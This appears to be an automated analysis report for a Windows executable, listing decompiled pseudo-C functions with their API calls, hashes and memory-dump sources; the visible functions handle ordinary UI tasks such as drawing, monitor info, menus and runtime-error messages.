    				L0040628C();
    				_push(_t72);
    				_push(0x4197f6);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t74;
    				_v16 = InterlockedExchange(0x4793e8, _v16);
    				_push(_t72);
    				_push(0x4197d7);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t74;
    				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
    					_t29 = 0;
    				} else {
    					_t29 = 1;
    				}
    				_v5 = _t29;
    				if(_v5 == 0) {
    					L15:
    					_pop(_t63);
    					 *[fs:eax] = _t63;
    					_push(E004197DE);
    					return E0040346C(_v16);
    				} else {
    					if( *((intOrPtr*)(_v16 + 8)) > 0) {
    						_v12 = E00413E68(_v16, 0);
    						E00413D58(_v16, 0);
    						L004063B4();
    						 *[fs:eax] = _t74;
    						 *[fs:eax] = _t74;
    						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4197a1, _t72, 0x47b884);
    						_pop(_t66);
    						 *[fs:eax] = _t66;
    						_t67 = 0x419772;
    						 *[fs:eax] = _t67;
    						_push(E004197A8);
    						_push(0x47b884);
    						L0040628C();
    						return 0;
    					} else {
    						goto L15;
    					}
    				}
    			}




















    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00419673
    • GetCurrentThreadId.KERNEL32 ref: 00419682
      • Part of subcall function 00419640: ResetEvent.KERNEL32(00000174,004196BD), ref: 00419646
    • RtlEnterCriticalSection.NTDLL(0047B884), ref: 004196C7
    • InterlockedExchange.KERNEL32(004793E8,?), ref: 004196E3
    • RtlLeaveCriticalSection.NTDLL(0047B884), ref: 0041973C
    • RtlEnterCriticalSection.NTDLL(0047B884), ref: 0041979B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
    • String ID: 8&A
    • API String ID: 2189153385-389848856
    • Opcode ID: d3bd2877f0a7c09705e8158d33bf006da81a1b306234ba8b5044abcbd71e535a
    • Instruction ID: b00a10e4d281bf59ce8b1b3397dc0b54de338f2e4545dac62f78258b82b534be
    • Opcode Fuzzy Hash: d3bd2877f0a7c09705e8158d33bf006da81a1b306234ba8b5044abcbd71e535a
    • Instruction Fuzzy Hash: B931A530A14304AFD701EFA5C862AEDB7E8EF49704F6684B6F414926D1D73D9C50CA29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0042270C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
    				void _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t23;
    				int _t24;
    				struct HMONITOR__* _t27;
    				struct tagMONITORINFO* _t29;
    				intOrPtr* _t31;
    
    				_t29 = _a8;
    				_t27 = _a4;
    				if( *0x47b93c != 0) {
    					_t24 = 0;
    					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
    						_t29->rcMonitor.left = 0;
    						_t29->rcMonitor.top = 0;
    						_t29->rcMonitor.right = GetSystemMetrics(0);
    						_t29->rcMonitor.bottom = GetSystemMetrics(1);
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						_t31 = _t29;
    						 *(_t31 + 0x24) = 1;
    						if( *_t31 >= 0x4c) {
    							_push("DISPLAY");
    							_push(_t31 + 0x28);
    							L00406444();
    						}
    						_t24 = 1;
    					}
    				} else {
    					 *0x47b920 = E004223DC(4, _t23,  *0x47b920, _t27, _t29);
    					_t24 = GetMonitorInfoA(_t27, _t29);
    				}
    				return _t24;
    			}














    APIs
    • GetMonitorInfoA.USER32(?,?), ref: 0042273D
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422764
    • GetSystemMetrics.USER32(00000000), ref: 00422779
    • GetSystemMetrics.USER32(00000001), ref: 00422784
    • lstrcpy.KERNEL32(?,DISPLAY), ref: 004227AE
      • Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
    • String ID: DISPLAY$GetMonitorInfo
    • API String ID: 1539801207-1633989206
    • Opcode ID: 974c75291028176e42d13dae0d986ecd793b55edffda241bc6c5993148428295
    • Instruction ID: d3c68cb7e5f7cd54e91d17da34bd044bb74d5e4be6c9a16b509d23d844f096e0
    • Opcode Fuzzy Hash: 974c75291028176e42d13dae0d986ecd793b55edffda241bc6c5993148428295
    • Instruction Fuzzy Hash: 2A11E1B17057286FD7208F61AD447A7B7E8EB49710F40493AEE19D7240E3B4A8808BA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E004227E0(intOrPtr _a4, intOrPtr* _a8) {
    				void _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t23;
    				int _t24;
    				intOrPtr _t26;
    				intOrPtr _t27;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    
    				_t29 = _a8;
    				_t27 = _a4;
    				if( *0x47b93d != 0) {
    					_t24 = 0;
    					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
    						 *((intOrPtr*)(_t29 + 4)) = 0;
    						 *((intOrPtr*)(_t29 + 8)) = 0;
    						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
    						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						_t31 = _t29;
    						 *(_t31 + 0x24) = 1;
    						if( *_t31 >= 0x4c) {
    							_push("DISPLAY");
    							_push(_t31 + 0x28);
    							L00406444();
    						}
    						_t24 = 1;
    					}
    				} else {
    					_t26 =  *0x47b924; // 0x4227e0
    					 *0x47b924 = E004223DC(5, _t23, _t26, _t27, _t29);
    					_t24 =  *0x47b924(_t27, _t29);
    				}
    				return _t24;
    			}















    APIs
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422838
    • GetSystemMetrics.USER32(00000000), ref: 0042284D
    • GetSystemMetrics.USER32(00000001), ref: 00422858
    • lstrcpy.KERNEL32(?,DISPLAY), ref: 00422882
      • Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
    • String ID: DISPLAY$GetMonitorInfoA$'B
    • API String ID: 2545840971-2064005331
    • Opcode ID: 11ca09601dbee3ccbfe1173f142a20817b501bee758b38835efb87562a69eecf
    • Instruction ID: 038b7de01a3aebff30798a460667cbd436dbca40844fcf4c83d304ff5d82f4b2
    • Opcode Fuzzy Hash: 11ca09601dbee3ccbfe1173f142a20817b501bee758b38835efb87562a69eecf
    • Instruction Fuzzy Hash: 6011E7B1701329AFD720AF60AD447A777E8EB05350F40463AEE5997340D7B4A8408BAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040405C(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x47b044 == 0) {
    					if( *0x479030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x47b218 == 0xd7b2 &&  *0x47b220 > 0) {
    						 *0x47b230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), 0x4040e4, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126,?,?,?,?,?,?,?,004041D2,00402B5B), ref: 00404095
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126,?,?,?,?,?,?,?,004041D2), ref: 0040409B
    • GetStdHandle.KERNEL32(000000F5,004040E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126), ref: 004040B0
    • WriteFile.KERNEL32(00000000,000000F5,004040E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126), ref: 004040B6
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004040D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: FileHandleWrite$Message
    • String ID: Error$Runtime error at 00000000
    • API String ID: 1570097196-2970929446
    • Opcode ID: c46b9e592332834341c8aac1b82159a12851ee92ffc91eccf822de94a3719203
    • Instruction ID: 792bbb5842f0e237c5821bb7421577ef3977d26575fc33f025656d1aa157ca7c
    • Opcode Fuzzy Hash: c46b9e592332834341c8aac1b82159a12851ee92ffc91eccf822de94a3719203
    • Instruction Fuzzy Hash: 97F0B1D059138475E62073905D0AFDF225C9784F18F10457FB32CB90E387BC48C496AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E004200D8(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v13;
    				struct tagPOINT _v21;
    				struct HDC__* _v28;
    				void* _v32;
    				intOrPtr _t78;
    				struct HDC__* _t80;
    				signed int _t82;
    				signed int _t83;
    				signed int _t84;
    				char _t85;
    				void* _t92;
    				struct HDC__* _t115;
    				void* _t136;
    				struct HDC__* _t160;
    				intOrPtr* _t164;
    				intOrPtr _t172;
    				intOrPtr _t176;
    				intOrPtr _t178;
    				intOrPtr _t180;
    				int* _t184;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t189;
    				intOrPtr _t190;
    
    				_t165 = __ecx;
    				_t188 = _t189;
    				_t190 = _t189 + 0xffffffe4;
    				_t184 = __ecx;
    				_v8 = __edx;
    				_t164 = __eax;
    				_t186 =  *((intOrPtr*)(__eax + 0x28));
    				_t172 =  *0x420324; // 0xf
    				E0041D794(_v8, __ecx, _t172);
    				E00420668(_t164);
    				_v12 = 0;
    				_v13 = 0;
    				_t78 =  *((intOrPtr*)(_t186 + 0x10));
    				if(_t78 != 0) {
    					_push(0xffffffff);
    					_push(_t78);
    					_t160 =  *(_v8 + 4);
    					_push(_t160);
    					L004065AC();
    					_v12 = _t160;
    					_push( *(_v8 + 4));
    					L00406584();
    					_v13 = 1;
    				}
    				_push(0xc);
    				_t80 =  *(_v8 + 4);
    				_push(_t80);
    				L00406514();
    				_push(_t80);
    				_push(0xe);
    				_t82 =  *(_v8 + 4);
    				L00406514();
    				_t83 = _t82;
    				_t84 = _t83 * _t82;
    				if(_t84 > 8) {
    					L4:
    					_t85 = 0;
    				} else {
    					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
    					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
    						_t85 = 1;
    					} else {
    						goto L4;
    					}
    				}
    				if(_t85 == 0) {
    					if(E00420464(_t164) == 0) {
    						SetStretchBltMode(E0041D6C0(_v8), 3);
    					}
    				} else {
    					GetBrushOrgEx( *(_v8 + 4),  &_v21);
    					SetStretchBltMode( *(_v8 + 4), 4);
    					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
    				}
    				_push(_t188);
    				_push(0x420314);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t190;
    				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
    					E00420608(_t164, _t165);
    				}
    				_t92 = E004203A8(_t164);
    				_t176 =  *0x420324; // 0xf
    				E0041D794(_t92, _t165, _t176);
    				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
    					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E004203A8(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
    					_pop(_t178);
    					 *[fs:eax] = _t178;
    					_push(0x42031b);
    					if(_v13 != 0) {
    						_push(0xffffffff);
    						_push(_v12);
    						_t115 =  *(_v8 + 4);
    						_push(_t115);
    						L004065AC();
    						return _t115;
    					}
    					return 0;
    				} else {
    					_v32 = 0;
    					_v28 = 0;
    					_push(_t188);
    					_push(0x4202a9);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t190;
    					L00406484();
    					_v28 = E0041DAAC(0);
    					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
    					E0041DC50( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E004203A8(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
    					_t136 = 0;
    					_t180 = 0;
    					 *[fs:eax] = _t180;
    					_push(0x4202ee);
    					if(_v32 != 0) {
    						_t136 = SelectObject(_v28, _v32);
    					}
    					if(_v28 != 0) {
    						return DeleteDC(_v28);
    					}
    					return _t136;
    				}
    			}






























    APIs
      • Part of subcall function 00420668: 72E7AC50.USER32(00000000,?,?,?,?,0041F297,00000000,0041F323), ref: 004206BE
      • Part of subcall function 00420668: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041F297,00000000,0041F323), ref: 00420701
    • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042017D
    • SetStretchBltMode.GDI32(?,00000004), ref: 0042018B
    • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 004201A3
    • SetStretchBltMode.GDI32(00000000,00000003), ref: 004201C0
    • SelectObject.GDI32(?,?), ref: 00420235
    • SelectObject.GDI32(?,00000000), ref: 00420294
    • DeleteDC.GDI32(00000000), ref: 004202A3
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: BrushModeObjectSelectStretch$CreateDeleteHalftonePalette
    • String ID:
    • API String ID: 2197772979-0
    • Opcode ID: 9d5856a229aa4b0ed948a8de568aa54b9cc0482c8a5184288b2d209389544f5f
    • Instruction ID: a80c6b273bba30387f9312ee822ebbf8d6c5fcf69b08db907f7d0bcd7af6b485
    • Opcode Fuzzy Hash: 9d5856a229aa4b0ed948a8de568aa54b9cc0482c8a5184288b2d209389544f5f
    • Instruction Fuzzy Hash: 61714A75B00205AFDB50DFA9DD85F5EB7F8AF08304F51856AB508E7682D638ED10CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00447EC4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				short _v22;
    				intOrPtr _v28;
    				struct HWND__* _v32;
    				char _v36;
    				intOrPtr _t50;
    				intOrPtr _t56;
    				intOrPtr _t60;
    				intOrPtr _t61;
    				intOrPtr _t62;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr _t68;
    				intOrPtr _t70;
    				intOrPtr _t80;
    				intOrPtr _t82;
    				intOrPtr _t85;
    				void* _t90;
    				void* _t107;
    				intOrPtr _t122;
    				void* _t124;
    				void* _t127;
    				void* _t128;
    				intOrPtr _t129;
    
    				_t125 = __esi;
    				_t124 = __edi;
    				_t107 = __ecx;
    				_t105 = __ebx;
    				_t127 = _t128;
    				_t129 = _t128 + 0xffffffe0;
    				_push(__ebx);
    				_push(__esi);
    				_v36 = 0;
    				_v8 = __eax;
    				_push(_t127);
    				_push(0x44818c);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t129;
    				E0042A7B8();
    				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
    					_t50 =  *0x479f10; // 0x41abfc
    					E00405DCC(_t50, _t107,  &_v36);
    					E0040B61C(_v36, 1);
    					E00403BF4();
    				}
    				if(GetCapture() != 0) {
    					SendMessageA(GetCapture(), 0x1f, 0, 0);
    				}
    				ReleaseCapture();
    				_t56 =  *0x47bb9c; // 0x2321704
    				E0044A3A4(_t56);
    				_push(_t127);
    				_push(0x44816f);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t129;
    				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
    				_v32 = GetActiveWindow();
    				_t60 =  *0x479bac; // 0x0
    				_v20 = _t60;
    				_t61 =  *0x47bba0; // 0x2321310
    				_t20 = _t61 + 0x78; // 0x0
    				_t62 =  *0x47bba0; // 0x2321310
    				_t21 = _t62 + 0x7c; // 0x2321554
    				E00413EE4( *_t21,  *_t20, 0);
    				_t65 =  *0x47bba0; // 0x2321310
    				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
    				_t66 =  *0x47bba0; // 0x2321310
    				_t24 = _t66 + 0x44; // 0x0
    				_v22 =  *_t24;
    				_t68 =  *0x47bba0; // 0x2321310
    				E004493C0(_t68,  *_t20, 0);
    				_t70 =  *0x47bba0; // 0x2321310
    				_t26 = _t70 + 0x48; // 0x0
    				_v28 =  *_t26;
    				_v16 = E00442264(0, _t105, _t124, _t125);
    				_push(_t127);
    				_push(0x44814d);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t129;
    				E00447E14(_v8);
    				_push(_t127);
    				_push(0x4480ac);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t129;
    				SendMessageA(E0043260C(_v8), 0xb000, 0, 0);
    				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
    				do {
    					_t80 =  *0x47bb9c; // 0x2321704
    					E0044B1AC(_t80, _t124, _t125);
    					_t82 =  *0x47bb9c; // 0x2321704
    					if( *((char*)(_t82 + 0x9c)) == 0) {
    						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
    							E00447D74(_v8);
    						}
    					} else {
    						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
    					}
    					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
    				} while (_t85 == 0);
    				_v12 = _t85;
    				SendMessageA(E0043260C(_v8), 0xb001, 0, 0);
    				_t90 = E0043260C(_v8);
    				if(_t90 != GetActiveWindow()) {
    					_v32 = 0;
    				}
    				_pop(_t122);
    				 *[fs:eax] = _t122;
    				_push(0x4480b3);
    				return E00447E0C();
    			}































    APIs
    • GetCapture.USER32 ref: 00447F35
    • GetCapture.USER32 ref: 00447F44
    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00447F4A
    • ReleaseCapture.USER32 ref: 00447F4F
    • GetActiveWindow.USER32 ref: 00447F76
    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0044800C
    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00448079
    • GetActiveWindow.USER32 ref: 00448088
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CaptureMessageSend$ActiveWindow$Release
    • String ID:
    • API String ID: 862346643-0
    • Opcode ID: 667b4eba30f8ed832c4f445fcd5549055d6f7a8c55defc6b26d7500254163615
    • Instruction ID: 891ce05c99c7a0c7d3f35091ad499386b188137e12638bb7896e74c7766aeaa3
    • Opcode Fuzzy Hash: 667b4eba30f8ed832c4f445fcd5549055d6f7a8c55defc6b26d7500254163615
    • Instruction Fuzzy Hash: E2513A70A00244DFEB10EF6AC946B5E77F1EF48704F5540BAE804AB6A2CB79AD40DB48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00430648(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
    				int _v8;
    				int _v12;
    				int _v16;
    				char _v20;
    				struct tagRECT _v36;
    				signed int _t54;
    				intOrPtr _t59;
    				int _t61;
    				void* _t63;
    				void* _t66;
    				void* _t82;
    				int _t98;
    				struct HDC__* _t99;
    
    				_t99 = __edx;
    				_t82 = __eax;
    				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
    				_v16 = SaveDC(__edx);
    				E0042A894(__edx, _a4, __ecx);
    				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
    				_t98 = 0;
    				_v12 = 0;
    				if((GetWindowLongA(E0043260C(_t82), 0xffffffec) & 0x00000002) == 0) {
    					_t54 = GetWindowLongA(E0043260C(_t82), 0xfffffff0);
    					__eflags = _t54 & 0x00800000;
    					if((_t54 & 0x00800000) != 0) {
    						_v12 = 3;
    						_t98 = 0xa00f;
    					}
    				} else {
    					_v12 = 0xa;
    					_t98 = 0x200f;
    				}
    				if(_t98 != 0) {
    					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
    					DrawEdge(_t99,  &_v36, _v12, _t98);
    					E0042A894(_t99, _v36.top, _v36.left);
    					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
    				}
    				E0042D0C4(_t82, _t99, 0x14, 0);
    				E0042D0C4(_t82, _t99, 0xf, 0);
    				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
    				if(_t59 == 0) {
    					L12:
    					_t61 = RestoreDC(_t99, _v16);
    					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
    					return _t61;
    				} else {
    					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
    					if(_t63 < 0) {
    						goto L12;
    					}
    					_v20 = _t63 + 1;
    					_v8 = 0;
    					do {
    						_t66 = E00413E68( *((intOrPtr*)(_t82 + 0x19c)), _v8);
    						_t107 =  *((char*)(_t66 + 0x57));
    						if( *((char*)(_t66 + 0x57)) != 0) {
    							E00430648(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
    						}
    						_v8 = _v8 + 1;
    						_t36 =  &_v20;
    						 *_t36 = _v20 - 1;
    					} while ( *_t36 != 0);
    					goto L12;
    				}
    			}

















    APIs
    • SaveDC.GDI32 ref: 0043065E
      • Part of subcall function 0042A894: GetWindowOrgEx.GDI32(?), ref: 0042A8A2
      • Part of subcall function 0042A894: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042A8B8
    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043067F
    • GetWindowLongA.USER32(00000000,000000EC), ref: 00430695
    • GetWindowLongA.USER32(00000000,000000F0), ref: 004306B7
    • SetRect.USER32(?,00000000,00000000,?,?), ref: 004306E3
    • DrawEdge.USER32(?,?,?,00000000), ref: 004306F2
    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00430717
    • RestoreDC.GDI32(?,?), ref: 00430788
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
    • String ID:
    • API String ID: 2976466617-0
    • Opcode ID: 30b03d3e48027a81f6de5f78405fbcd8eb6fcd175706d7947e9a2a898969c566
    • Instruction ID: af9657c4f0c67481b2a93df167d6872bccd163c7545bd33edea00a0cb035c3aa
    • Opcode Fuzzy Hash: 30b03d3e48027a81f6de5f78405fbcd8eb6fcd175706d7947e9a2a898969c566
    • Instruction Fuzzy Hash: 93416471B002146BDB10EB9DCC91FAE77B9AF48304F10416AF905EB396D779ED018B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0043B6EC(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
    				char _v5;
    				char _v12;
    				char _v13;
    				struct tagMENUITEMINFOA _v61;
    				char _v68;
    				intOrPtr _t103;
    				CHAR* _t109;
    				char _t115;
    				short _t149;
    				void* _t154;
    				intOrPtr _t161;
    				intOrPtr _t184;
    				struct HMENU__* _t186;
    				int _t190;
    				void* _t192;
    				intOrPtr _t193;
    				void* _t196;
    				void* _t205;
    
    				_t155 = __ecx;
    				_v68 = 0;
    				_v12 = 0;
    				_v5 = __ecx;
    				_t186 = __edx;
    				_t154 = __eax;
    				_push(_t196);
    				_push(0x43b947);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t196 + 0xffffffc0;
    				if( *((char*)(__eax + 0x3e)) == 0) {
    					L22:
    					_pop(_t161);
    					 *[fs:eax] = _t161;
    					_push(0x43b94e);
    					E004041E0( &_v68);
    					return E004041E0( &_v12);
    				}
    				E00404278( &_v12,  *((intOrPtr*)(__eax + 0x30)));
    				if(E0043D6A8(_t154) <= 0) {
    					__eflags =  *((short*)(_t154 + 0x60));
    					if( *((short*)(_t154 + 0x60)) == 0) {
    						L8:
    						if((GetVersion() & 0x000000ff) < 4) {
    							_t190 =  *(0x479b2c + ((E004045EC( *((intOrPtr*)(_t154 + 0x30)), 0x43b96c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00479B20 |  *0x00479B10 |  *0x00479B18 | 0x00000400;
    							_t103 = E0043D6A8(_t154);
    							__eflags = _t103;
    							if(_t103 <= 0) {
    								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004046A0(_v12));
    							} else {
    								_t109 = E004046A0( *((intOrPtr*)(_t154 + 0x30)));
    								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0043BBFC(_t154), _t109);
    							}
    							goto L22;
    						}
    						_v61.cbSize = 0x2c;
    						_v61.fMask = 0x3f;
    						_t192 = E0043DC64(_t154);
    						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0043D280(_t154) == 0) {
    							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
    								L14:
    								_t115 = 0;
    								goto L16;
    							}
    							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
    							if(_t205 == 0) {
    								goto L15;
    							}
    							goto L14;
    						} else {
    							L15:
    							_t115 = 1;
    							L16:
    							_v13 = _t115;
    							_v61.fType =  *(0x479b60 + ((E004045EC( *((intOrPtr*)(_t154 + 0x30)), 0x43b96c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00479B58 |  *0x00479B34 |  *0x00479B68 |  *0x00479B70;
    							_v61.fState =  *0x00479B40 |  *0x00479B50 |  *0x00479B48;
